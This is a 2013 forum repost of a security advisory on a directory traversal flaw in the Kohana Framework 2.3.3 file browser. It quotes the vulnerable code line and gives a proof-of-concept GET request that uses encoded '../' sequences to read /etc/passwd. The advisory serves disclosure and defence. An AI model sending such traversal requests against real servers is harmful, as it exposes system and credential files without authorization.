Praetorian503 Posted January 29, 2013 Report Posted January 29, 2013 Kohana Framework version 2.3.3 suffers from a directory traversal vulnerability.Title:======Kohana Framework v2.3.3 - Directory Traversal VulnerabilityDate:=====2013-01-27References:===========http://www.vulnerability-lab.com/get_content.php?id=841VL-ID:=====837Common Vulnerability Scoring System:====================================7.1Introduction:=============Kohana is an open source, object oriented MVC web framework built using PHP5 by a team of volunteers that aims to be swift, secure, and small. (copy from vendor website) This is an OOP framework that is extremely DRY. Everything is built using strict PHP 5 classes and objects. Many common components are included: translation tools, database access, code profiling, encryption, validation, and more.Extending existing components and adding new libraries is very easy. Uses the BSD license, so you can use and modify it for commercial purposes. Benchmarking a framework is hard and rarely reflects the real world, but Kohana is very efficient and carefully optimized for real world usage. Very well commented code and a simple routing structure makes it easy to understand what is happening. Simple and effective tools help identify and solve performance issues quickly.(Copy of the Vendor Homepage: http://kohanaframework.org/ )Abstract:=========The Vulnerability Laboratory Research Team discovered a Directory Traversal web vulnerability in the Kohana v2.3.3 Content Management System.Report-Timeline:================2013-01-27: Public DisclosureStatus:========PublishedAffected Products:==================KohanaProduct: Framework - Content Management System 2.3.3Exploitation-Technique:=======================RemoteSeverity:=========HighDetails:========A Directory Traversal web vulnerability is detected in the Kohana Content Management System web application.The vulnerability allows remote attackers to request local directories and files of the web server application system.The vulnerability is located in the `master/classes/Kohana/Filebrowser.php` file in line 90 when processing to request the path dir via replace. The filter replaces `../` by null and it applies on file reading requests. Review: Kohana/Filebrowser.php$thumb = Route::get('wysiwyg/filebrowser')->uri(array('action' => 'thumb','path' => str_replace(array($dir, DIRECTORY_SEPARATOR), array('', '/'), $filename)));Remote attackers can bypass the validation with the vulnerable replace function in the file browser to read local web server files via directory (path) traversal attack.Exploitaton of the vulnerability requires no privileged application user account and no user interaction.Successful exploitation of the vulnerability results in read of arbitrary system files to compromise web server.Vulnerable Module(s): [+] FilebrowserVulnerable Function(s): [+] str_replace > dirVulnerable Parameter(s): [+] ?pathProof of Concept:=================The vulnerability can be exploited by remote attackers without privileged application user account and without required user interaction.For demonstration or reproduce ...Review: Kohana/Filebrowser.php$thumb = Route::get('wysiwyg/filebrowser')->uri(array('action' => 'thumb','path' => str_replace(array($dir, DIRECTORY_SEPARATOR), array('', '/'), $filename)));Review: GET RequestGET http://media.[server].com/directory/graphics/?path=..%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F%2Fetc%2Fpasswd HTTP/1.0Host: media.[server].comUser-Agent: Kami VLPoC: http://media.[server].com/directory/graphics/?path=..%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F%2Fetc%2Fpasswd Risk:=====The security risk of the directory traversal web vulnerability is estimated as high(+).Credits:========Vulnerability Laboratory [Research Team] - Karim B. (kami@vulnerability-lab.com)Disclaimer:===========The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/registerContact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.comSection: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.comSocial: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0labFeeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.phpAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory-- VULNERABILITY RESEARCH LABORATORYLABORATORY RESEARCH TEAMCONTACT: research@vulnerability-lab.comSource: PacketStorm Quote